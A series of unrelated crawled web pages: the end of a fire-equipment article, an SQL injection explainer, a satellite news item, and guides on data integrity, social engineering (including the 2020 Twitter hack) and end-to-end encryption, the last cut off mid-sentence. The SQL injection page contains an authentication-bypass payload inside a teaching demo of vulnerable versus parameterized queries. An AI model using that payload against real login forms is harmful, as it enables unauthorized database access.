The Emergency Rescue Tender (ERT), including all accessories, should be designed and manufactured as per the relevant Indian Standards wherever applicable and should follow sound engineering practice. The following components are usually provided, but others can be included as per the customer's requirements: Diesel Generator, Battery Operated Amplifier System, Extension Ladder, Pneumatic Lifting Equipment, Leak Sealing Pads, Leak Control Kits, Low Temperature Protective Suit, Fire Entry Suit, Fire Proximity Suit, Hydraulic Spreader and Cutter, Portable Gas Detectors, Self Contained Breathing Apparatus (SCBA), LPG Transfer Equipment, Traffic Control Equipment, etc.
Portable fire extinguishers have an important role to play in the fire protection programme of any industry. However, they have their limitations. They are not designed to fight a large or spreading fire. Even against small fires, they are useful only under certain conditions. Water has greater cooling properties than any of the other extinguishing agents and can be used to reach a deep seated fire, so water should be used on burning solids. However, it is ineffective in many fire scenarios, especially on oil fires. CO2 is most suitable for dealing with small contained fires and small fires involving escaping liquids on horizontal and vertical surfaces. Foam is the only proven method of controlling and extinguishing fires in storage tanks, tank farms, effluent water treatment facilities, etc. Dry powder is the most suitable type of extinguisher for dealing with fires in flammable liquids. It is also a non-conductor of electricity and can be safely used on fires where there is a risk of electrical shock. In spite of all technical advances, water is the cheapest, most efficient and most environmentally friendly fire extinguishing medium. No amount of appliances or equipment would be of much use if sufficient quantities of water, under the required pressure, were not available for fire fighting. An automatic sprinkler installation will, in a large majority of circumstances, control and extinguish a fire with less than 1000 litres of water and may, therefore, be the most economic way of limiting the loss in a fire, particularly in areas of limited water supplies. The best way to fight fire is to prevent it. Each industry and occupancy must provide itself with the proper type and an adequate number of fire fighting equipment to combat, control and extinguish fire and explosion efficiently, in their industries and occupancies.
While procuring fire equipment, ensure proper quality, approved by a recognised authority such as the Bureau of Indian Standards (BIS). The successful use of any type of fire equipment depends upon three elements being in place at the same time, i.e. equipment, maintenance and training. It should be kept in mind that the correct equipment and proper maintenance without effective training on how to use the equipment is inadequate. Similarly, effective equipment in the hands of trained personnel will not be effective if the equipment has not been maintained and fails or performs poorly in a fire. Trained personnel using well maintained equipment will not be successful if the equipment was not the proper type for the hazard.
References:
- Bureau of Indian Standards – IS933, IS934, IS940, IS942, IS2171, IS2190, IS2871, IS2878, IS4308, IS4562, IS4861, IS4862, IS5896, IS6234, IS6382, IS8442, IS10204, IS10658, IS11070, IS11108, IS15105
- The Factories Act, 1948 with the Maharashtra Factories Rules, 1963. Mumbai, Labour Law Agency, 2010.
- Maharashtra Fire Prevention and Life Safety Measures Rules, 2008.
- Nair, R. R. – Fire and Explosion Hazards – Management of Industrial Hazards (CEP Publication) by S. B. Hegde Patil and R. R. Nair. All India Council for Technical Education, Bangalore, 1997.
- Nair, R. R. – Fire Prevention and Protection. Industrial Safety Review, June 2012.
- Nair, R. R. and Veeraraghavan, R. – Fire Technology: Fire Prevention and Fire Protection (CEP Publication). All India Council for Technical Education, Bangalore, 2002.
- National Building Code of India 2005 – Bureau of Indian Standards, New Delhi, 2007.
- NFPA 10 – Standard for Portable Fire Extinguishers, 2007 Edition. National Fire Protection Association, USA.
- NFPA Fire Protection Handbook, 19th Edition – National Fire Protection Association, USA.
- Safety and Fire Protection Handbook – Edited by R. Veeraraghavan. Mumbai, Safe Technology, 2009.
- Training Programme on Basic Fire Fighting – Loss Prevention Association of India Ltd., Bombay, 1991.
- Voelkert, J. C. – Fire and Fire Extinguishments, 2009.
Mr. R. R. Nair has more than 40 years' exposure in Occupational Safety, Health & Fire Protection. He is the author of 15 books and more than 60 articles on various topics in Safety, Health & Environment. He has carried out more than 45 safety audits in various industries and high rise buildings.
For more information contact: M.: 09224212544 / 09167246783, Res.: 022 2766 5975 E-mail: [email protected]
<urn:uuid:14b44af6-22df-437c-a14f-2858de8f1b4e>
CC-MAIN-2024-38
https://www.isrmag.com/equipment-for-fire-protection/
2024-09-20T10:48:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00876.warc.gz
en
0.9256
6,398
2.5625
3
SQL injection (SQLi) is a frequent topic on this blog – it refers to an injection attack in which an attacker can execute malicious SQL statements that give them control over a web application's database server. Since an SQL injection vulnerability can affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities. An attacker taking advantage of an SQLi vulnerability is essentially exploiting a weakness introduced into the application through poor web application development practices. This allows attackers to send SQL commands to the web application, allowing them to gain unauthorized access to data held in the backend database. Given the right circumstances, an attacker can leverage an SQL injection vulnerability to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete records in a database, affecting data integrity. SQL injection can thus provide an attacker with unauthorized access to sensitive data including customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive information. While SQLi is mostly used to steal data from the database, the vulnerability can be escalated further, especially if the permissions on the database are not correctly configured. For example, the attacker can inject a query that causes some tables to be deleted from the database, effectively causing a DoS attack. An attacker can also potentially deploy a web shell onto the server, subsequently take over the server, and even pivot into other systems as a result of SQLi. So, we have established that SQLi is a major threat to any web application that does not properly handle user input passed into SQL statements, but how common is the vulnerability? In our latest Web Application Vulnerability Report we registered a 3% drop in SQL injection from the previous year. The fact that SQL injection is slowly receding is good news for defenders — it means that all the effort poured in by educators in the field is starting to bear fruit. This being said, with 23% of sampled targets vulnerable to SQLi, we are certainly nowhere near casting it away into the history books. This post contained excerpts from the 2016 Acunetix Web Application Vulnerability Report. For more stats and coverage on web application vulnerabilities in 2016, download the report for free.
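To make the "poor development practices" point concrete, here is a minimal, self-contained sketch using Python's built-in sqlite3 module. The table and values are invented for this example; the pattern, not the schema, is what matters: building a query by string concatenation lets attacker-controlled input rewrite the SQL, while a parameterized query keeps the input as plain data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

attacker_input = "' OR '1'='1"

# Vulnerable: user input is concatenated straight into the SQL text,
# so the WHERE clause becomes always-true and authentication is bypassed.
vulnerable = ("SELECT * FROM users WHERE username = 'alice' "
              "AND password = '" + attacker_input + "'")
print(conn.execute(vulnerable).fetchall())   # returns alice's row

# Safer: a parameterized query treats the input purely as a value.
safe = "SELECT * FROM users WHERE username = ? AND password = ?"
print(conn.execute(safe, ("alice", attacker_input)).fetchall())  # []
```

The same distinction applies to any database driver or ORM: keeping SQL structure separate from user-supplied data is the core defence against SQLi.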
<urn:uuid:291d7e78-526f-4279-931e-f5f9a6873034>
CC-MAIN-2024-38
https://www.acunetix.com/blog/articles/sql-injection-receding-but-still-concern/
2024-09-09T15:53:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00076.warc.gz
en
0.913431
502
2.875
3
NASA Funds Launch of Shoebox-Size Space QubeSat From Berkeley Students (InterestingEngineering)
A team at UC Berkeley hopes to launch a quantum CubeSat into space, and they already have NASA's funding. NASA offered to cover the launch costs — upwards of $300,000 — through the CubeSat Launch Initiative, which was developed to fly small experiments as auxiliary payloads on nominal rocket launches. NOTE: QubeSat is short for quantum CubeSat. The Berkeley team's satellite will soon test a new kind of gyroscope based on the quantum mechanical interactions that happen in imperfect diamonds. The diamond gyroscope was first invented at Berkeley, in the laboratory of physicist Dmitry Budker, professor of the graduate school. The undergraduate team behind the QubeSat is also part of an undergraduate aerospace club called Space Technologies at Cal (STAC), which has already flown experiments with help from balloons and the International Space Station — an impressive record for a group that's only four years old. Some of the intrepid team's graduates have moved on to work at major aerospace companies like Boeing, SpaceX, and several others. "The NASA grant is just for the launch, so we have still got to supply and manufacture the satellite ourselves," said Köttering, a junior majoring in applied mathematics and physics. The UC Berkeley team is now trying to raise $15,000 via crowdfunding and the campus's Big Give campaign, and is looking for donated equipment from several manufacturers. The team has already received a $4,950 grant from the UC Berkeley Student Technology Fund.
<urn:uuid:ef454dc1-4b15-4a1b-bebb-4d6d970d0d0e>
CC-MAIN-2024-38
https://www.insidequantumtechnology.com/news-archive/nasa-funds-launch-of-shoebox-size-space-satellite-from-berkeley-students/
2024-09-09T15:25:39Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00076.warc.gz
en
0.959023
339
2.578125
3
What is data integrity?
Data integrity refers to the stringent set of security standards and processes established to ensure the accuracy and consistency of the data that lives within an organization. Since most decisions made within an organization are data-driven in nature, it's vital to ensure the overall quality of business-critical information throughout its life cycle.
Why is data integrity important?
Data integrity works in tandem with establishing data security and confidentiality. When the integrity of the data stored within your repositories is established, it can yield the following benefits:
- Quick and confident decision-making processes.
- Comprehensive audit trails that help forensic analysis.
- Compliance with multiple data regulatory standards.
- Accuracy in data-driven analysis.
Data integrity risks
There are multiple security issues instigated by internal and external factors that could threaten the overall integrity of the stored data. Here are a few examples:
Malicious insider actions: Disgruntled employees can undermine your organization's security and sabotage the integrity of stored data.
Mistakes by negligent employees: When careless users do not follow appropriate protocols and standards for data storage and processing, data integrity can be compromised.
Malware and spyware infections: Upon intrusion, malicious software and applications alter and steal data within your network.
Hardware failures: When a server or computer that holds data crashes or malfunctions, it could jeopardize the integrity of the stored data.
How to ensure data integrity
Follow the best practices below to establish and maintain data integrity:
- Back up essential information to avoid data loss, and always store a copy of untampered data.
- Implement the principle of least privilege to establish access control measures that limit access to data only to authorized users.
- Track all file and folder activities in real time across various data repositories using file server auditing software.
- Assess various risks to data, and scan for insider threats, the presence of orphaned data, and permission hygiene issues.
- Establish data lineage by tracking data's movement from origin to destruction and ensuring its integrity at each level.
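One simple, widely used way to confirm that backed-up or stored data has not been silently altered is to record a cryptographic checksum when the file is written and compare it later. The sketch below uses Python's standard hashlib module; the file name is a placeholder chosen for the example, not a reference to any particular system.

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify(path: Path, expected_digest: str) -> bool:
    """True only if the file still matches the digest recorded earlier."""
    return sha256_of(path) == expected_digest

# Hypothetical usage: record the digest when the file is archived,
# store it separately from the data, then re-check before relying on it.
# baseline = sha256_of(Path("quarterly_report.xlsx"))
# ...later...
# assert verify(Path("quarterly_report.xlsx"), baseline), "file was modified"
```

Storing the digest away from the data itself (for example with the audit trail) is what makes the check meaningful: an attacker who can alter the file should not also be able to alter the recorded checksum.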
<urn:uuid:c1c4be70-e272-47fd-b6d7-4f46acd7dac6>
CC-MAIN-2024-38
https://www.manageengine.com/in/data-security/what-is/data-integrity.html?source=data-in-use
2024-09-10T17:03:32Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00876.warc.gz
en
0.890113
506
3.484375
3
6/18/2023
Introduction
Social Engineering: The Invisible Threat
In our digitized world, the threat landscape has vastly expanded. One term has steadily risen to prominence among the spectrum of online perils: Social Engineering. Unlike the conventional image of a hacker aggressively typing away on a keyboard to crack sophisticated codes, social engineering paints a subtler and arguably more sinister picture. This threat is not purely about computers or technology - it's about manipulating human psychology. Social engineering is a form of deception where tricksters manipulate individuals into revealing sensitive information, such as passwords, bank details, or even company secrets. It is an art of exploiting human weaknesses, whether that's trust, curiosity, fear, or simple ignorance. We live in an era where our data is a coveted treasure, and protecting it has become paramount.
Guarding Our Digital Selves
Why should we care? Simply put, no one is immune. Cybercriminals armed with social engineering tactics can strike anyone: from individual internet users to small businesses and multinational corporations. These digital rogues don't discriminate. Their damage can range from mild inconvenience to catastrophic financial and reputational losses. Moreover, the digital and real worlds are no longer separate entities - they are intrinsically intertwined. Our digital persona often holds just as much significance as our physical one, if not more. Our social profiles, online banking, digital communications, and even our smart appliances at home - all weave into the fabric of our digital identity. Hence, it's not just about protecting our devices but also our digital lives. In the face of this ever-evolving threat, knowledge is our best defence. Understanding the tactics of social engineers and adopting appropriate protective measures can greatly reduce our susceptibility to these attacks. The first step? Equipping yourself with the necessary armour to guard against the wiles of social engineering. Read on to navigate your way through this digital battlefield.
Understanding Social Engineering
The Deceptive Art
Imagine this: a stranger converses with you, perhaps at a coffee shop. They charm you, win your trust, and subtly, almost imperceptibly, you find yourself revealing personal information. This is an instance of social engineering in the real world. Translate this scenario into the digital landscape, and you have a typical social engineering attack blueprint. In essence, social engineering is a form of manipulation that exploits human psychology to extract confidential information. Social engineers, the architects of these attacks, do not need advanced technical skills. Instead, they leverage an intricate understanding of human behaviour to trick individuals into revealing their passwords, credit card numbers, or other sensitive information. It's less about cracking codes and more about cracking minds.
Tools of the Trade
While the art of social engineering may be complex, social engineers' tactics can be broken down into recognizable patterns. Here are a few common techniques:
Social Engineering In Action
To understand the true power of social engineering, let's examine a couple of real-world incidents:
As we delve deeper into how to protect ourselves from social engineering, remember awareness is half the battle. By understanding these tactics, we can be better prepared to spot and avoid social engineering attempts.
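Some of the recognizable patterns mentioned above can even be screened for mechanically. The fragment below is a deliberately simple, assumption-laden heuristic rather than a real filter: the urgency keyword list and the idea of comparing a link's visible text with its actual destination are illustrative choices made for this sketch, and the sample message is made up.

```python
import re
from urllib.parse import urlparse

URGENCY_WORDS = {"urgent", "immediately", "verify", "suspended", "act now"}

LINK_RE = re.compile(r'<a[^>]+href="([^"]+)"[^>]*>(.*?)</a>',
                     re.IGNORECASE | re.DOTALL)

def phishing_signals(html_body: str) -> list[str]:
    """Return human-readable warnings for a single email body."""
    warnings = []
    lowered = html_body.lower()
    if any(word in lowered for word in URGENCY_WORDS):
        warnings.append("urgency language detected")
    for href, text in LINK_RE.findall(html_body):
        real_domain = urlparse(href).netloc.lower()
        shown = re.sub(r"<[^>]+>", "", text).strip().lower()
        # Flag links whose displayed URL does not match the real destination.
        if shown.startswith("http") and urlparse(shown).netloc.lower() != real_domain:
            warnings.append(f"link text '{shown}' hides destination '{real_domain}'")
    return warnings

# Hypothetical example message:
sample = ('Your account will be suspended. Act now: '
          '<a href="http://198.51.100.7/login">https://www.mybank.com</a>')
print(phishing_signals(sample))
```

A heuristic like this catches only the crudest lures; the human habits described in the next sections are what attackers actually rely on, which is why awareness remains the primary defence.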
The Human Element of Social Engineering
Tugging the Psychological Strings
Social engineering, at its core, is a psychological play. It preys on the elements that make us human—our emotions, social patterns, and inherent trust in certain institutions. It's an uncomfortable truth, but the soft spot in most security systems is not a glitch in the software but the people using it. Social engineers understand this and leverage human behaviour to circumvent digital walls. But how exactly do they do this?
Exploiting Trust
Trust is a fundamental aspect of human relationships and interactions. We trust our friends and our family, and we extend this trust to institutions like our banks or service providers. Social engineers exploit this innate trust. For example, in a phishing attempt, they might pose as your bank, sending you an email that looks authentic, and because you trust your bank, you're more likely to engage with the email without questioning its validity.
Leveraging Authority
Humans are hardwired to respect authority, and this can be exploited in social engineering attacks. An attacker might impersonate a figure of authority, such as a CEO, a police officer, or a government official, to create a sense of urgency or fear, compelling the victim to divulge information without proper verification. This tactic is commonly seen in CEO fraud attacks or tech support scams.
Playing on Fear and Urgency
Fear is a powerful motivator, and in a state of panic, people often act without thinking clearly. Social engineers use this to their advantage, instilling fear or creating a sense of urgency to push individuals into hasty actions. For example, they might send an email warning that your bank account is under threat and you need to immediately log in to secure it, thereby luring you to a fake login page.
Appealing to Curiosity or Greed
Social engineers also tap into human emotions like curiosity or greed. They may use clickbait titles promising sensational news or offer too-good-to-be-true rewards, leading the user down a dangerous path. Understanding these psychological tactics is crucial. As we become more aware of how social engineers manipulate our emotions and responses, we're better equipped to guard ourselves against these deceptive strategies. The key lies in balancing healthy skepticism and beneficial online interactions. Remember, in the realm of social engineering, if something feels off, it probably is.
Recognizing Social Engineering Attacks
Unmasking the Digital Deception
While social engineers employ a vast array of tactics to deceive their victims, the good news is that many of these attacks can be identified with a vigilant eye and a skeptical mindset. Let's break down how to spot the common forms of social engineering attacks:
Phishing Emails and Malicious Links
Phishing emails and malicious links form the backbone of many social engineering attacks. Here are some red flags to look out for:
Recognizing Requests for Sensitive Information
Any unsolicited request for sensitive information, such as your password, social security number, or bank details, should raise an immediate red flag. Legitimate organizations typically do not ask for this information via email or phone.
Spotting Impersonation Attacks
Impersonation attacks can happen in both the digital and physical worlds. Digitally, attackers might mimic the email style of a colleague or the format of an email from a trusted organization. In the physical world, they might pose as a maintenance worker or a fellow employee.
To counteract this: In the face of social engineering, maintaining a sense of healthy skepticism is your best defence. The adage "think before you click" is especially relevant here. If something feels off, take a moment to question it before proceeding.
Protecting Yourself Online
Building a Robust Digital Fortress
Being aware of the threats posed by social engineering is half the battle; the other half is building your defences. Online security may seem daunting, but you can significantly bolster it by adopting some straightforward practices. Here are some key steps to enhance your online protection:
The Power of Passwords
Your passwords are the keys to your digital kingdom, and it's essential that they're both strong and unique. Aim for a mix of letters, numbers, and symbols, and avoid obvious choices like 'password123' or 'admin'. Additionally, ensure that each of your online accounts has a unique password; this way, if one account is compromised, the others remain safe. Password managers can be handy tools to help manage this complexity.
Two-Factor Authentication: Your Digital Bodyguard
Two-factor authentication (2FA) is like a second layer of security for your accounts. It requires you to provide two forms of identification before you can access your account. This is typically something you know (like your password) and something you have (like a code sent to your phone). With 2FA, even if a hacker manages to get your password, they will still need a second form of identification to access your account.
Safe Browsing: Navigating the Digital Seas Safely
Always check the URL of a website before entering any personal information. A secure site's URL should start with 'https://'—the 's' stands for 'secure'. Be cautious when downloading files or clicking links, especially from unknown sources.
VPNs and Secure Networks: The Invisible Cloak
Virtual Private Networks (VPNs) can provide an extra layer of security by masking your IP address and encrypting your online traffic. This is especially useful on public Wi-Fi networks, which are often not secure. Always try to use trusted and secure networks for sensitive online activities.
Regular Software Updates: The Evolving Shield
Software updates often include security enhancements and patches for known vulnerabilities. Regularly updating your operating system, apps, and security software is crucial to protecting your devices against the latest threats. In the fight against social engineering, the key to your online security is in your hands. It's not about being completely impervious to attacks. Rather, it's about making it so difficult for social engineers to breach your defences that they choose to move on to an easier target.
Responding to Social Engineering Attacks
Action Plan for the Unthinkable
Despite our best efforts, there may come a time when you find yourself a target or even a victim of a social engineering attack. The initial shock can be disorienting, but responding quickly and methodically is crucial. Here's what you should do:
Steps to Take if You've Been Targeted or Victimized
The Importance of Reporting Attacks
Even if you manage to fend off an attack, it's important to report it. If applicable, social engineering attacks should be reported to your organization's IT or security department and to local law enforcement agencies. By reporting the attack, you're not only possibly helping to catch the perpetrators but also helping to improve awareness and prevention measures for these types of crimes.
In the world of cybersecurity, shared knowledge is our best defence. Remember, it's not a failure if you fall prey to a social engineering attack. These attackers are skilled manipulators who exploit trust and sociability, inherently human traits. However, taking swift and decisive action can limit the damage and help prevent future attacks.

The Role of Continuous Learning

Staying One Step Ahead in the Cybersecurity Race

In the ever-changing cybersecurity landscape, standing still is the same as falling behind. Social engineering is a dynamic threat, with attackers constantly refining their methods and devising new ways to trick unsuspecting individuals. Staying ahead of these threats requires constant learning and adaptation.

The Ever-Evolving Nature of Social Engineering

Social engineering isn't a static field; the tactics that were popular five years ago may differ from those most commonly used today. As our digital behaviours evolve and new technologies emerge, so too do the methods employed by social engineers. For example, as more people become aware of email phishing, social engineers have moved towards more sophisticated techniques like spear-phishing (targeted attacks) or whaling (attacks targeting high-level executives). As the world continues to digitalize, the attack surface expands, creating newer, more creative attacks.

The Importance of Staying Informed

Given this rapid pace of change, it's crucial to stay informed about the latest developments in social engineering attacks and the protective measures to counter them. Subscribe to cybersecurity blogs or newsletters, attend relevant webinars, and participate in online cybersecurity communities. Many of these resources are freely available and can provide valuable insights. Make it a point to regularly update your knowledge about the latest scams, tricks, and attack vectors used by social engineers. Equally important is to keep abreast of advancements in protective measures—be it the latest in two-factor authentication, VPN technologies, or privacy-enhancing software.

Regular cybersecurity training is a valuable investment for organizations. It can update employees on the latest threats and reinforce the importance of adhering to security protocols. Remember, the human element is often the weakest link in a security chain, and continuous learning can turn that weakness into a strength.

In conclusion, dealing with social engineering is not a one-time task but an ongoing commitment. The digital landscape changes rapidly, and so do the threats we face. However, by committing to continuous learning, we can ensure we're always one step ahead of the attackers, ready to counter whatever new trick they throw our way.

Twitter Attributes Latest Hack of Its Systems to Social Engineering

Last July 15th, verified Twitter accounts, including those of Amazon CEO Jeff Bezos and former U.S. President Barack Obama, tweeted similar content, saying that the account owners had decided to give back to their community by sending back twice the Bitcoin amount (limited to US $50 million) for every Bitcoin sent to a particular Bitcoin address. The tweets were later removed – a confirmation that the tweets were part of a scam and that the verified Twitter accounts involved had, in fact, been hacked. A total of 393 transactions sent varying amounts of Bitcoin to the indicated Bitcoin address. Whoever orchestrated the campaign earned 12.8 Bitcoins, valued at US $117,473 as of July 18, 2020.
How Was Twitter Hacked?

In a blog post dated July 18, 2020, Twitter attributed the hacking of the 130 verified Twitter accounts to social engineering. "At this time, we believe attackers targeted certain Twitter employees through a social engineering scheme," Twitter said. The company, however, didn't elaborate on how the social engineering was carried out by the attackers. Twitter defined social engineering as the "intentional manipulation of people into performing certain actions and divulging confidential information."

According to Twitter, the intentional manipulation of a small number of Twitter employees enabled the attackers to access the company's internal systems using the credentials of the targeted employees and to get through the company's two-factor authentication (2FA) protection. Twitter said the attackers were able to view personal information, including phone numbers and email addresses – information that was accessible to some of the targeted employees. Out of the 130 hacked verified accounts, Twitter added, there were 45 accounts where the attackers were able to log in, send tweets, and initiate a password reset. In accounts taken over by the attackers, the company said the attackers may have been able to view additional information. The company also added that the attackers attempted to sell some of the hacked accounts.

SIM Swap

The July 15th cyber incident at Twitter isn't the first hacking incident that the company has experienced. Nearly a year earlier, the Twitter account of its CEO Jack Dorsey was hacked. After taking over Dorsey's Twitter account @jack, attackers fired off nearly two dozen tweets and retweets. "The phone number associated with the account was compromised due to a security oversight by the mobile provider," Twitter said in a statement. "This allowed an unauthorized person to compose and send tweets via text message from the phone number."

The above-mentioned statement from Twitter on how its CEO's account was hacked describes a typical SIM swap attack – a type of cyberattack in which a victim's phone number is moved over to a SIM card under the attacker's control. This type of attack is carried out in two ways. One method is calling the mobile phone company's customer help line and pretending to be the intended victim. The other method is paying off phone company employees to do the phone number switches. There have been reports that attackers paid off phone company employees to do the phone number switching for as little as US $100.

SIM swapping plays a big role in attacks that try to bypass text message-based two-factor authentication, an authentication method in which, on top of the usual username and password requirement, a user can only log in to an account by providing a one-time code – a code that's sent to the phone number provided by the user. In a SIM swap attack, because the target's phone number has been moved to a SIM controlled by the attacker, the one-time code is delivered to the attacker instead.

In September 2019, the U.S. Federal Bureau of Investigation (FBI) warned its partner organizations about SIM swapping. According to the FBI, between 2018 and 2019, the most common tactic used by attackers to circumvent two-factor authentication was SIM swapping.
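The SIM-swap risk described above applies specifically to one-time codes delivered over SMS. A rough illustration of the alternative, app-based TOTP codes derived from a secret that never leaves the user's device, is sketched below using the third-party pyotp library. This is a simplified, hypothetical example for clarity, not how Twitter or any carrier actually implements 2FA.

```python
# Minimal sketch of app-based TOTP (time-based one-time passwords), which
# SIM swapping cannot intercept because no code is ever sent over SMS.
# Assumes the third-party 'pyotp' package (pip install pyotp).
import pyotp

# Done once at enrolment: the service and the user's authenticator app
# share this secret (usually via a QR code). It never travels over SMS.
shared_secret = pyotp.random_base32()
totp = pyotp.TOTP(shared_secret)

# On the user's device: the authenticator app derives the current 6-digit
# code from the shared secret and the current time.
code_from_app = totp.now()

# On the server: verify the submitted code against the same secret.
# valid_window=1 tolerates small clock drift between device and server.
if totp.verify(code_from_app, valid_window=1):
    print("Second factor accepted")
else:
    print("Second factor rejected")
```

Because the secret stays on the device and the server, taking over the victim's phone number gains the attacker nothing, which is why authenticator apps or hardware keys are generally preferred over SMS codes.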
VPN Vulnerability

In 2019, a report came out that Twitter had left its internal systems exposed to outsiders by failing to apply the latest security update to a particular piece of software. This time, however, bug bounty hunters found the vulnerability and responsibly disclosed it to Twitter. In a blog post dated September 2, 2019, security researchers at DEVCORE reported that they were able to perform remote code execution on Twitter's internal systems – that is, to run code of their choosing on someone else's computing device and make changes to it, regardless of where that device is geographically located. The researchers said they initially gained access to Twitter's internal system by exploiting an unpatched Pulse Secure VPN used by the company.

The security researchers at DEVCORE are the same researchers who discovered the remote code execution vulnerability in Pulse Secure VPN products and reported it to the software vendor, Pulse Secure. The same researchers also discovered and reported security vulnerabilities in the VPN products of OpenVPN and Fortinet. "During our research, we found a new attack vector to take over all the clients [computers or software that access a service made available by a server]," the DEVCORE researchers said. "It's the 'logon script' feature. It appears in almost EVERY SSL VPNs, such as OpenVPN, Fortinet, Pulse Secure… and more. It can execute corresponding scripts to mount the network filesystem or change the routing table once the VPN connection established. Due to this 'hacker-friendly' feature, once we got the admin privilege, we can leverage this feature to infect all the VPN clients!"

The researchers also reported that they bypassed the two-factor authentication because Twitter had enabled the Pulse Secure VPN's roaming session feature, which allows a session to be used from multiple IP locations. "Due to this 'convenient' [roaming session] feature, we can just download the session database and forge our cookies to log into their system!" Prior to going public, the security researchers at DEVCORE reported their findings to Twitter via the company's bug bounty program.

Social engineering is a significant risk for most organizations and individuals alike. This is why we've created a blog post with 52 cybersecurity tips for businesses and individuals to help mitigate key risks.

Author: Steve E. Driz, I.S.P., ITCP
<urn:uuid:c368d482-9a4c-4d1d-b900-e5af86ab7cf0>
CC-MAIN-2024-38
https://www.drizgroup.com/driz_group_blog/category/social-engineering
2024-09-11T23:48:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00776.warc.gz
en
0.941328
3,759
2.65625
3
End-to-end encryption, or E2EE, is one of the most popular modern encryption methods for securing online communications, such as messaging and email services, by ensuring that messages are only readable by the intended recipient. This article will explore the basics of end-to-end encryption, how it works, and its advantages and disadvantages.

End-to-end encryption is a type of encryption protocol that encrypts data at the sender's endpoint and decrypts it only at the recipient's endpoint. It ensures that data transmitted between two parties is fully protected from unauthorized access or interception by a third party. This technology is critical for maintaining privacy and preventing data breaches, especially in the age of digital communication. With E2E encryption, individuals can communicate with each other without fear of their messages being intercepted, stolen, or tampered with. This protocol is widely used in messaging apps, email services, and other online communication tools. It's important to note that end-to-end encryption is not foolproof, and there are still risks associated with data breaches or attacks, but it is an effective tool for keeping sensitive information private and secure.

E2EE differs from other types of encryption in terms of who controls the cryptographic keys necessary for encryption and decryption. In other types of encryption, such as symmetric encryption, both the sender and the recipient have access to the same secret key. However, in E2EE, the private key used for decryption is only available to the recipient, making it much more secure, while the public key, used to encrypt the data, can be freely shared. Another important difference is that E2EE provides end-to-end protection, whereas other types of encryption do not. For example, encryption in transit only protects data while it is being transferred between the sender and the recipient. Once the data reaches the server, it is decrypted and stored in plaintext, making it vulnerable to attacks. E2E encryption also offers protection against attacks that target the server or the communication channel between the sender and the server. In a server-side attack, an attacker gains access to the server and can read all of the data stored on it. However, with E2EE, even if the attacker gains access to the server, they will not be able to access any of the encrypted data. In summary, E2EE differs from other types of encryption in several ways, including endpoint encryption, key control, end-to-end protection, and protection against attacks on the server and communication channel.

End-to-end encryption is widely used in encrypted email services to ensure secure communication between users, and businesses utilize it to secure their internal communication channels. The protocol works by encrypting data at the sender's endpoint so that it can only be decrypted by the intended recipient. This means that even if the service provider or an attacker intercepts the message, they cannot access the data without the recipient's private key. By implementing E2EE and privacy standards, users can be confident that their sensitive information is secure and private, allowing them to communicate freely without fear of interception or surveillance. End-to-end encryption provides a high level of protection against various forms of cyber threats.
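To make the mechanics concrete, here is a minimal sketch of the public-key pattern just described, using the open-source PyNaCl library (Curve25519 key pairs). It illustrates the concept only; real messaging apps layer additional protocols such as key ratcheting and authentication on top, and the names used here (alice, bob, the sample message) are purely illustrative.

```python
# Minimal end-to-end encryption sketch using PyNaCl (pip install pynacl).
# Each party holds a private key that never leaves their device; only the
# corresponding public keys are exchanged through the server.
from nacl.public import PrivateKey, Box

# Key generation happens on each user's own device.
alice_private = PrivateKey.generate()
bob_private = PrivateKey.generate()

# Only the public halves are shared (e.g., uploaded to the service).
alice_public = alice_private.public_key
bob_public = bob_private.public_key

# Sender side: Alice encrypts for Bob using her private key and Bob's public key.
sending_box = Box(alice_private, bob_public)
ciphertext = sending_box.encrypt(b"Meet at 10:00. Keep this between us.")

# The server only ever sees 'ciphertext'; without Bob's private key it is opaque.

# Recipient side: Bob decrypts with his private key and Alice's public key.
receiving_box = Box(bob_private, alice_public)
plaintext = receiving_box.decrypt(ciphertext)
print(plaintext.decode())
```

Because the Box construction is authenticated, tampering with the ciphertext in transit causes decryption to fail rather than yield altered plaintext, which is the property the next section refers to when it says E2EE resists man-in-the-middle modification.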
E2EE ensures that the content of a message is only accessible to the intended recipient, protecting against unauthorized access by third parties, including service providers, cybercriminals, and government agencies. E2E encryption also protects against man-in-the-middle attacks, where an attacker intercepts and alters messages sent between two parties. With E2EE, even if a message is intercepted, the encryption prevents the attacker from reading the contents of the message. Additionally, E2EE protects against data breaches, as the end to end encrypted data is useless to attackers without the decryption keys. End-to-end encryption is not a “silver bullet” that can protect against all types of threats. One important limitation is that it does not protect against malware or other types of attacks on the devices themselves. If one of the devices is compromised, for example, by a hacker who gains access to the device or installs malicious software, the encryption will not be effective in protecting the contents of the communication. Another limitation is that end-to-end encryption does not protect against social engineering attacks or other forms of coercion. If a party is forced or tricked into revealing their encryption keys or providing access to their device, the encryption will not be effective in preventing unauthorized data access. While end-to-end encryption is a powerful tool for protecting privacy and security, it is not a panacea and should be used in conjunction with other security measures to provide comprehensive protection against a range of threats. Data privacy is the reason to focus on solid E2E encryption capabilities. One key advantage is that it provides greater privacy and data security for users by ensuring that only the intended recipient can read the messages. This is because the encryption keys used to encrypt and decrypt the messages are only held by the sender and recipient, and not by any intermediaries such as service providers or government agencies. The E2EE key exchange is considered unbreakable using known algorithms and current computing power. Another advantage is that end-to-end encryption provides protection against data breaches and other forms of 